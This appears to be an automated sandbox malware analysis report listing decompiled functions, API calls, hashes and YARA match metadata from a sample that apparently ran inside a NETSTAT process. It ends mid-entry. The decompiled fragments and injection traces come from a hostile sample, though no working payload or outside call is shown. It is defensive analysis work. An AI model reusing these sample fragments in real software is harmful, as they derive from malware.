                • Instruction Fuzzy Hash: A4014B3200014ABBCF1A5E84DD41EEE3F62BF29358B58951DFB1868035D637C9B2AB81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA6BF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00EA6BF2(signed short* __ecx, void* __edx, signed char __esi, void* __eflags) {
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed short* _t25;
				void* _t27;
				signed int _t30;
				void* _t32;
				signed char _t33;
				void* _t35;

				_t33 = __esi;
				_t27 = __edx;
				_t25 = __ecx;
				asm("cli");
				if(__eflags < 0) {
					 *((intOrPtr*)(_t35 + 0x10)) = 0x1a;
					_t32 = 0xd;
					while(1) {
						_t17 =  *_t25 & 0x0000ffff;
						if(_t17 ==  *((intOrPtr*)(_t35 + 0x10))) {
							break;
						}
						if(_t17 == _t32) {
							__eflags = _t25 - _t27 - 2;
							if(_t25 < _t27 - 2) {
								_t25 =  &(_t25[1]);
								_t21 = 0xa;
								__eflags =  *_t25 - _t21;
								if( *_t25 != _t21) {
									_t21 = 0xd;
									_t32 = _t21;
								}
								 *_t33 = _t21;
								_t33 = _t33 + 2;
								__eflags = _t33;
							}
						} else {
							 *_t33 = _t17;
							_t33 = _t33 + 2;
							_t25 =  &(_t25[1]);
						}
						if(_t25 < _t27) {
							continue;
						} else {
						}
						goto L19;
					}
					_t19 =  *((intOrPtr*)(0xecf230 +  *(_t35 - 0xc) * 4));
					_t9 = _t19 + _t22 + 4;
					 *_t9 =  *(_t19 + _t22 + 4) | 0x00000002;
					__eflags =  *_t9;
				}
				L19:
				_t13 = _t35 - 0x10; // 0xeb2b47
				_t14 =  *_t13;
				_t30 = _t33 - _t14 & 0xfffffffe;
				_t23 =  *(_t35 - 0x18);
				if(_t14 !=  *((intOrPtr*)(_t35 + 0xc))) {
					E00EB2248(_t14);
				}
				if(_t23 != 0xfffffffe) {
					_t30 = _t23;
				}
				_t15 = _t30;
				return _t15;
			}
















                0x00ea6bf2
                0x00ea6bf2
                0x00ea6bf2
                0x00eafd7e
                0x00eafd7f
                0x00eafd83
                0x00eafd8a
                0x00eafd8b
                0x00eafd8b
                0x00eafd92
                0x00000000
                0x00000000
                0x00eafd97
                0x00eafda7
                0x00eafda9
                0x00eafdab
                0x00eafdb0
                0x00eafdb1
                0x00eafdb4
                0x00eafdb8
                0x00eafdba
                0x00eafdba
                0x00eafdbb
                0x00eafdbe
                0x00eafdbe
                0x00eafdbe
                0x00eafd99
                0x00eafd99
                0x00eafd9c
                0x00eafd9f
                0x00eafd9f
                0x00eafdc3
                0x00000000
                0x00000000
                0x00eafdc5
                0x00000000
                0x00eafdc3
                0x00eafdca
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00eafdd6
                0x00eafdd6
                0x00eafdd6
                0x00eafddd
                0x00eafd49
                0x00eafd4f
                0x00eafd52
                0x00eafd57
                0x00eafd5b
                0x00eafd5d
                0x00eafd5d
                0x00eafd5f
                0x00eaffda

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __lseeki64_nolock_free
                • String ID: G+$G+
                • API String ID: 1437703282-4250722411
                • Opcode ID: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction ID: f7cc905273a8573437fafaf7d41ef350bb67400dcf1eb5e4cdd8aca58f21581c
                • Opcode Fuzzy Hash: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction Fuzzy Hash: 02F0F62260020583CB214FE898413B96391BF8B324F742736E925BF1E0D33578818241
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                Function 007DA32A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 285 7da32a-7da381 call 7daf30 NtCreateFile
                APIs
                • NtCreateFile.NTDLL(00000060,00000000,.z`,007D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 007DA37D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID: .z`
                • API String ID: 823142352-1441809116
                • Opcode ID: f135aac7ac35a8c0f6471782e6624f1f60dcef30933a7682c4cafdda7e9e19ee
                • Instruction ID: 3c91d7418bcedd49f83b8161e782dd1b368938b004a8603e7512fb5d6f8e0e9e
                • Opcode Fuzzy Hash: f135aac7ac35a8c0f6471782e6624f1f60dcef30933a7682c4cafdda7e9e19ee
                • Instruction Fuzzy Hash: BBF0BDB2215108BFCB48CF98DC95EEB33ADBF8C304F158249BA0E97241C630E8118BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA330 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 289 7da330-7da381 call 7daf30 NtCreateFile
                APIs
                • NtCreateFile.NTDLL(00000060,00000000,.z`,007D4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007D4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 007DA37D
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID: .z`
                • API String ID: 823142352-1441809116
                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction ID: 7539aa2c9f3b04f5835f0828976fb475811c2eaca6d69d74803295615c20b845
                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction Fuzzy Hash: 74F0BDB2211208ABCB08CF88DC85EEB77ADAF8C754F158248FA0D97241C630E8118BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA3DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 293 7da3db-7da3f6 294 7da3fc-7da429 NtReadFile 293->294 295 7da3f7 call 7daf30 293->295 295->294
                APIs
                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J},FFFFFFFF,?,rM},?,00000000), ref: 007DA425
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: 1J}
                • API String ID: 2738559852-4274715835
                • Opcode ID: 403fd95997e0d90c9885a290d1184dd89e016249acd1fca1f66b1da156cc10e2
                • Instruction ID: b62a1966dcf36630a9ca8b3fe8b08be399cdb06811e4237a9b4c66f0e16fb1d2
                • Opcode Fuzzy Hash: 403fd95997e0d90c9885a290d1184dd89e016249acd1fca1f66b1da156cc10e2
                • Instruction Fuzzy Hash: 27F0E2B2210108ABCB04DF89CC80EEB77ADEF8C714F058249FA0D97241C630E8118BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA3E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 296 7da3e0-7da429 call 7daf30 NtReadFile
                APIs
                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J},FFFFFFFF,?,rM},?,00000000), ref: 007DA425
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: 1J}
                • API String ID: 2738559852-4274715835
                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction ID: 7046a2fd59f096de8a687380432b317de226dc56a0abce889c55938529606574
                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction Fuzzy Hash: F8F0A4B2210208ABCB14DF89DC85EEB77ADEF8C754F158249BA1D97241D630E8118BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA45A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 305 7da45a-7da476 306 7da47c-7da489 NtClose 305->306 307 7da477 call 7daf30 305->307 307->306
                APIs
                • NtClose.NTDLL(PM},?,?,007D4D50,00000000,FFFFFFFF), ref: 007DA485
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID: PM}
                • API String ID: 3535843008-4171156331
                • Opcode ID: eddde8f201e6ab0ebdf7677234046481fb6db6f204c8d7b1b20ec5e5fd326a9c
                • Instruction ID: 262eef978130a18ab26162eee9c75703e089671b48506c582fd212579bc626e5
                • Opcode Fuzzy Hash: eddde8f201e6ab0ebdf7677234046481fb6db6f204c8d7b1b20ec5e5fd326a9c
                • Instruction Fuzzy Hash: 94E08CB2210210BBDB20EBE48C45EE77BA8EF45750F144499FA889B242C130E60087D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA460 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 308 7da460-7da489 call 7daf30 NtClose
                APIs
                • NtClose.NTDLL(PM},?,?,007D4D50,00000000,FFFFFFFF), ref: 007DA485
                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID: PM}
                • API String ID: 3535843008-4171156331
                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction ID: 38df07c6fed115cc92585007e83689679d8e2ce40b4e57708955487f87892f9d
                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction Fuzzy Hash: CDD01776610214BBD710EB98CC89EA77BACEF48760F15449ABA189B242C530FA0086E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007DA510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                Download Yara Rule
                APIs
                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007C2D11,00002000,00003000,00000004), ref: 007DA549
                Memory Dump Source
                • Source File: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_7c0000_NETSTAT.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction ID: 14e9f32638ce86875b564bfc4df77c8200899d6291b66140c42c06fbf570c261
                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction Fuzzy Hash: EFF015B2210208ABCB14DF89CC81EAB77ADEF88754F118149FE0897241C630F811CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 518d5813df52a99bb589b621ca3a8758b6e16f320f4a8703b46af70ee3ba927c
                • Instruction ID: a2c3efb9282bfd52901a74b76e5b46a716b826fff9377957a9481f3a903dcea0
                • Opcode Fuzzy Hash: 518d5813df52a99bb589b621ca3a8758b6e16f320f4a8703b46af70ee3ba927c
                • Instruction Fuzzy Hash: DA90027521144812D100A59D54586460005D7E0341F91D021A5014595ECBA588917171
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                • Instruction ID: 70c567ac5bbde512bb77cc7b4ab908c84606a0c14b9b004f86c4974e27d70a43
                • Opcode Fuzzy Hash: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                • Instruction Fuzzy Hash: A190026D22344412D180B15D545860A0005D7D1242FD1D425A0005598CCE5588696361
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 078bd8f4991087879366a0edc97e847dd941011e3f89dc01e1660ad6fec1ac54
                • Instruction ID: d093df841dab78a6c62404b0b1d58c2c24abd66330262ac74db7eaf327eefed9
                • Opcode Fuzzy Hash: 078bd8f4991087879366a0edc97e847dd941011e3f89dc01e1660ad6fec1ac54
                • Instruction Fuzzy Hash: DD90027532158812D110A15D84547060005D7D1241F91C421A0814598D8BD588917162
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ce606d43e03c0165d032e42989283a179587d4a569c3d371b3f50f4b3d9d3f9a
                • Instruction ID: dba5cd200947147b505116db852d8ed751f8688d5d23b7db741e0acd41690c09
                • Opcode Fuzzy Hash: ce606d43e03c0165d032e42989283a179587d4a569c3d371b3f50f4b3d9d3f9a
                • Instruction Fuzzy Hash: A290027521144C12D180B15D445464A0005D7D1341FD1C025A0015694DCF558A5977E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d02e274d16ac046a5aea72cab9c2a0f9b92918a29c534455fdc7760617b06a97
                • Instruction ID: fe8e68fc38d1e78159e909207aecf44a4eda7234687f0a1c7ba90fc1d689aa7b
                • Opcode Fuzzy Hash: d02e274d16ac046a5aea72cab9c2a0f9b92918a29c534455fdc7760617b06a97
                • Instruction Fuzzy Hash: 92900265221C4452D200A56D4C64B070005D7D0343F91C125A0144594CCE5588616561
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0c5ecd0ff4e2a644d9737d8499a49560cf63ee3efeafb48987750f3aa993e937
                • Instruction ID: 05639f4024afc7203f65b0d1738fe1ae17a6cc5a5bf9d282fb2b3799b2737145
                • Opcode Fuzzy Hash: 0c5ecd0ff4e2a644d9737d8499a49560cf63ee3efeafb48987750f3aa993e937
                • Instruction Fuzzy Hash: D890027521548C52D140B15D4454A460015D7D0345F91C021A00546D4D9B658D55B6A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033996E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 067e38556e8e77fbf0e14ac80d06d386337e9b102cd1d7a844b2caa8ac185165
                • Instruction ID: 9eda8a00cad1387e957e072f0319c70de9c9c2e1982103673fea5ef8fc6b71e5
                • Opcode Fuzzy Hash: 067e38556e8e77fbf0e14ac80d06d386337e9b102cd1d7a844b2caa8ac185165
                • Instruction Fuzzy Hash: 4C9002752114CC12D110A15D845474A0005D7D0341F95C421A4414698D8BD588917161
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033996D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0b7acad8e80c23e4ad5c728625753c3ce60fb99138d24f8c9df364a49343f5d2
                • Instruction ID: 0732e78e77b8ddd37b38d2b9f86eb7eeb7cdb94221b0768c80edf729631e4a49
                • Opcode Fuzzy Hash: 0b7acad8e80c23e4ad5c728625753c3ce60fb99138d24f8c9df364a49343f5d2
                • Instruction Fuzzy Hash: 4E90027521144C52D100A15D4454B460005D7E0341F91C026A0114694D8B55C8517561
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: eb7d1ce84720b1792cefc1baf30de197185cae431402526a88b9fff64eaaf8d8
                • Instruction ID: 37b332ebae66103deaff566fda399d8f02656c5d7f80185c3257b2e84409cc2b
                • Opcode Fuzzy Hash: eb7d1ce84720b1792cefc1baf30de197185cae431402526a88b9fff64eaaf8d8
                • Instruction Fuzzy Hash: F89002B521144812D140B15D44547460005D7D0341F91C021A5054594E8B998DD576A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 86359cfd2e81fdad12f1dcf9e639ea5e7574348e4b31f103ac790bbc4a66842b
                • Instruction ID: 8287a6ce1a5da461bccc6ecd61b1554b1e1eb475355095022bda8d899d9d744a
                • Opcode Fuzzy Hash: 86359cfd2e81fdad12f1dcf9e639ea5e7574348e4b31f103ac790bbc4a66842b
                • Instruction Fuzzy Hash: AC900269221444130105E55D07545070046D7D5391391C031F1005590CDB6188616161
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033999A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d7014bdbd8cbb1313a316b1d01c798079ba6a337deec9667ac74eda08dd495b2
                • Instruction ID: e15aa8bb6ed62a8f0c8e358452d77316467b88c6bc3d6e146566e4b70d67bcf7
                • Opcode Fuzzy Hash: d7014bdbd8cbb1313a316b1d01c798079ba6a337deec9667ac74eda08dd495b2
                • Instruction Fuzzy Hash: B49002A535144852D100A15D4464B060005D7E1341F91C025E1054594D8B59CC527166
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033995D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 23eb2d67ddb515c5990656571faf02a4ba1129ab58cb6607ea009cf1c6235e00
                • Instruction ID: cc6f2cef59f315e61246cc3cac413a1343bfd5bf0899799592ad7f29d7190c71
                • Opcode Fuzzy Hash: 23eb2d67ddb515c5990656571faf02a4ba1129ab58cb6607ea009cf1c6235e00
                • Instruction Fuzzy Hash: 3F9002A5212444134105B15D4464616400AD7E0241B91C031E10045D0DCA6588917165
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 379c54a4c908e82e366ca24988d3be49a108e62987ae4b021216285bf8116714
                • Instruction ID: 74a6e6cd2decc80382b99340635852ebfa4e32a34ed62440940e23abcbf39824
                • Opcode Fuzzy Hash: 379c54a4c908e82e366ca24988d3be49a108e62987ae4b021216285bf8116714
                • Instruction Fuzzy Hash: 8B90027521144823D111A15D45547070009D7D0281FD1C422A0414598D9B968952B161
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03399840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: df2b177db5bd14a0c47223fc51721f53215553dba1e9aaafd0859834b8a04fcb
                • Instruction ID: a8e72ded2dac34098dbdb4954c889849475a9820971e8a52779ffd6b0b41c123
                • Opcode Fuzzy Hash: df2b177db5bd14a0c47223fc51721f53215553dba1e9aaafd0859834b8a04fcb
                • Instruction Fuzzy Hash: A8900265252485625545F15D44545074006E7E02817D1C022A1404990C8A669856E661
                Uniqueness

                Uniqueness Score: -1.00%

                Function 007D9050 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
